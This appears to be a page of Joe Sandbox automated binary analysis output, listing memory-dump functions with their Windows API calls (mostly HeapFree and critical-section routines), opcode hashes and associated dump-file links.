Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 947ecfb74c626a94d16928ad2f5698fedc2a2d36e888d38e3200d53e42d2b6a0
Instruction ID: 77e035586fd582fb0027886afb4711e227a2f9763534c6895c8ba93294462217
Opcode Fuzzy Hash: 947ecfb74c626a94d16928ad2f5698fedc2a2d36e888d38e3200d53e42d2b6a0
Instruction Fuzzy Hash: 99D18171A4025A9FDB34CF24DC41BEAB7B8AF54304F0441F9E949A7281EA71AEC5DF90

Function 00A148B0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A14BFA
HeapFree.KERNEL32(00000000,?), ref: 00A14C47
HeapFree.KERNEL32(00000000,?), ref: 00A14CFD
HeapFree.KERNEL32(00000000,?), ref: 00A14D1F

Strings

NULL, xrefs: 00A14901

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 9402bbcf95cdae646af230cd370235a4933848a0fcd562d2e9b27971125e95fb
Instruction ID: a605e537f7aa22f6091af65b6883295135a0c32d71ffa0bd06924084a2521bbe
Opcode Fuzzy Hash: 9402bbcf95cdae646af230cd370235a4933848a0fcd562d2e9b27971125e95fb
Instruction Fuzzy Hash: 8CD1A475A4021A9BDB34CF14DC41FEAB7B8AF58304F0541E9E949A7241EB71AEC4DF90

Function 00A1A1A0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 324memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A1A437
HeapFree.KERNEL32(00000000,?), ref: 00A1A524
HeapFree.KERNEL32(00000000,?), ref: 00A1A5DD
HeapFree.KERNEL32(00000000,?), ref: 00A1A5FF

Strings

NULL, xrefs: 00A1A1E6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 89fb8843253b98f6de170f040b5b97246bb8cc349872c44256632324b9e1a1a6
Instruction ID: 151e4027c823723366aecd2198ad6f80741bab4b409635666524d3fd8683fa06
Opcode Fuzzy Hash: 89fb8843253b98f6de170f040b5b97246bb8cc349872c44256632324b9e1a1a6
Instruction Fuzzy Hash: C8D16E71A013189FDB20DB64DC45FDAB7B9AF55304F0441E9E909E7282EB70AE84CF92

Function 00A23220 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 324memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A234B7
HeapFree.KERNEL32(00000000,?), ref: 00A235A4
HeapFree.KERNEL32(00000000,?), ref: 00A2365D
HeapFree.KERNEL32(00000000,?), ref: 00A2367F

Strings

NULL, xrefs: 00A23266

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 7c6733ed213309d775e9c84a254c8e0b2357e05163b1c9f7230e31d556daa394
Instruction ID: 536e73ba3f734968d7f1b1e1d7f08a9b7a94536d04d93da331dec5981a969532
Opcode Fuzzy Hash: 7c6733ed213309d775e9c84a254c8e0b2357e05163b1c9f7230e31d556daa394
Instruction Fuzzy Hash: E4D13E72A002289FDF20DB64DC45FDAB7B9AF45304F0441E9E909A7292EB759F84CF91

Function 00A18120 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 279memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A183C5
HeapFree.KERNEL32(00000000,?), ref: 00A18412
HeapFree.KERNEL32(00000000,?), ref: 00A184D2
HeapFree.KERNEL32(00000000,?), ref: 00A184F4

Strings

NULL, xrefs: 00A1816D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 5d4dc1043530ef9f53961f9257a08689131136cd842abc93b4c68103755144ca
Instruction ID: 762d0d8e429d8f4c7bc70fb6d088cc29233a663126bad699cd4981eadec70feb
Opcode Fuzzy Hash: 5d4dc1043530ef9f53961f9257a08689131136cd842abc93b4c68103755144ca
Instruction Fuzzy Hash: 6FB16F71A003199BDB20CF24DC55FEAB7B9AF44304F0442E9E909A7252DB75AEC4CFA1

Function 00A21260 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A2149F
HeapFree.KERNEL32(00000000,?), ref: 00A214EC
HeapFree.KERNEL32(00000000,?), ref: 00A215A2
HeapFree.KERNEL32(00000000,?), ref: 00A215C4

Strings

NULL, xrefs: 00A212A5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 1c79f0df197c561b8f79c355d5377d15eff9c35ad83ab10d48551982b2f89ced
Instruction ID: fd26d6319bded9f323984399a2b2efc2c64accf745b5f59cf604cc3c29b1a864
Opcode Fuzzy Hash: 1c79f0df197c561b8f79c355d5377d15eff9c35ad83ab10d48551982b2f89ced
Instruction Fuzzy Hash: 77A17171E003289BDB20DB64DC55FDAB7B9AF54300F0442E9E90DA7292DB759E88CF91

Function 00A20EE0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A2111F
HeapFree.KERNEL32(00000000,?), ref: 00A2116C
HeapFree.KERNEL32(00000000,?), ref: 00A21222
HeapFree.KERNEL32(00000000,?), ref: 00A21244

Strings

NULL, xrefs: 00A20F25

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 275eccff90697f7f7ef42cf63a6fe257fccccc65f3894d0fb5455f1884128453
Instruction ID: e66c28d709754803ae7ee72dc2a978ae8a35663246e503e8ec12cf19b3e6d092
Opcode Fuzzy Hash: 275eccff90697f7f7ef42cf63a6fe257fccccc65f3894d0fb5455f1884128453
Instruction Fuzzy Hash: 18A18171A00328DBDB20DB24DC55FDAB7B9AF54300F4442E9E909E7282D771AE88CF91

Function 00904B90 Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,BBFE6088,00000000,?,00000004), ref: 00904BDB
InitializeCriticalSection.KERNEL32(?), ref: 00904C3D

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(00000014), ref: 00904E7F
DeleteCriticalSection.KERNEL32(?,?), ref: 00904F0B
DeleteCriticalSection.KERNEL32(?,?), ref: 00904F5D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$DeleteInitialize$EnterLeave
String ID:
API String ID: 2187886827-0
Opcode ID: ebb727e52892697eb918c5e882790e0b9299d2de997084fb5eb284e3b84d8c11
Instruction ID: f36a4843dfe0990ec32402e8c59ec24ba40dc094c04a035a738f3a4d65833d8b
Opcode Fuzzy Hash: ebb727e52892697eb918c5e882790e0b9299d2de997084fb5eb284e3b84d8c11
Instruction Fuzzy Hash: BAB14BB0901258DFDB20CF64C99879EBBB4BF05308F1441DDD609A7292DB79AE88CF95

Function 0082B160 Relevance: 7.7, APIs: 5, Instructions: 229memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,BBFE6088,00000000,00000000,00000000,00000000,00C13EA0,000000FF,?,0088E0D9,00000000,00000000,00000001,00A313A7,BBFE6088,?), ref: 0082B2D3
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000000,00000000,00C13EA0,000000FF,?,0088E0D9,00000000,00000000,00000001,00A313A7,BBFE6088), ref: 0082B36B
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000000,00000000,00C13EA0,000000FF,?,0088E0D9,00000000,00000000,00000001,00A313A7,BBFE6088), ref: 0082B386
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000000,00000000,00C13EA0,000000FF,?,0088E0D9,00000000,00000000,00000001,00A313A7,BBFE6088), ref: 0082B3A1
HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000000,00000000,00000000,00000000,00C13EA0,000000FF,?,0088E0D9,00000000,00000000,00000001,00A313A7,BBFE6088), ref: 0082B3DE

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Free$Heap$Library
String ID:
API String ID: 912051049-0
Opcode ID: e6cf49900e8a84888056d3b602514749cf242a8bda667717048521cc81e479c8
Instruction ID: 55e4bb0e2f8799c42b6ca8e11347c3aae90429981cfe80bac8f2302ce93b637f
Opcode Fuzzy Hash: e6cf49900e8a84888056d3b602514749cf242a8bda667717048521cc81e479c8
Instruction Fuzzy Hash: 3B9125B1701721ABDB18CF65E898B2AB7A4FF08711F18416DE805DB7A1CB75ED50CB90

Function 00A195D0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A19741
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A1977F
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A1983F
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A1985B

Strings

NULL, xrefs: 00A19629, 00A196CB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: f1d1ef4ab3ffad631de59030ce93413f6fd90162c6a75225dff9f13f692d0400
Instruction ID: 14dc51ee3405485690b2c93423f895ac7b5f3056c3bc1a1f69169a5427f8d654
Opcode Fuzzy Hash: f1d1ef4ab3ffad631de59030ce93413f6fd90162c6a75225dff9f13f692d0400
Instruction Fuzzy Hash: AB819F71E002189BDB20CF64DC55BEEB7B8BF45304F144169E909EB392EB71A984CFA0

Function 00A22660 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A227D1
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A2280F
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A228C5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A228E1

Strings

NULL, xrefs: 00A226B5, 00A2275B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 8eadca20ca83e0747faedcfce5d7173c14e15abc33433e37f021b1765166050f
Instruction ID: b23d873ee791f97bfea3573ff17674e3c4c50e961a6164c0e55c9d96548bba6c
Opcode Fuzzy Hash: 8eadca20ca83e0747faedcfce5d7173c14e15abc33433e37f021b1765166050f
Instruction Fuzzy Hash: D581A371E00318ABDB24DB68EC45BEEB7B8EF45704F144179E949EB282DB71E944CB90

Function 00A19880 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A199F1
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A19A2F
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A19AE5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A19B01

Strings

NULL, xrefs: 00A198D5, 00A1997B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: b8db75e51ecdab4574619100615a05c82a4b0567605282ccb6e768cbdbbc05d8
Instruction ID: 9a6b9673fb86291d14b5b31463ffeaa58448afc8678dbda8f22a889c5e6ade40
Opcode Fuzzy Hash: b8db75e51ecdab4574619100615a05c82a4b0567605282ccb6e768cbdbbc05d8
Instruction Fuzzy Hash: D281C271E003189BDB20CB64DC55BEEB7B8EF45700F144269E949EB392DB71A989CF90

Function 00A22900 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A22A71
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A22AAF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A22B65
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C731C4,00C731C4), ref: 00A22B81

Strings

NULL, xrefs: 00A22955, 00A229FB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 6aa63dc6ed61369bd6142a4acbad9daa5718ee75c98d5e475d424bdfb854012a
Instruction ID: 90b44a68c565e9078a8e1f757d542a872de720582758d34583d10778ae1342d8
Opcode Fuzzy Hash: 6aa63dc6ed61369bd6142a4acbad9daa5718ee75c98d5e475d424bdfb854012a
Instruction Fuzzy Hash: 7281B471E00218AFDB30DF68EC45BEEB7B8EF45344F144269E909EB282DB719944CB90

Function 00A2FBC0 Relevance: 7.7, APIs: 6, Instructions: 161memorystringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00D022C0,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A2FC38
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A2FC64
HeapAlloc.KERNEL32(03400000,00000000,00000018,?,?,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A2FC81
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A2FD69
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A2FD79

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heapfree$AllocProcessstrcmp
String ID:
API String ID: 1866314173-0
Opcode ID: 683153db836d0f3d2ad473b0c8370fc9065c8b4cf9e90d9235b8ccba40c1012e
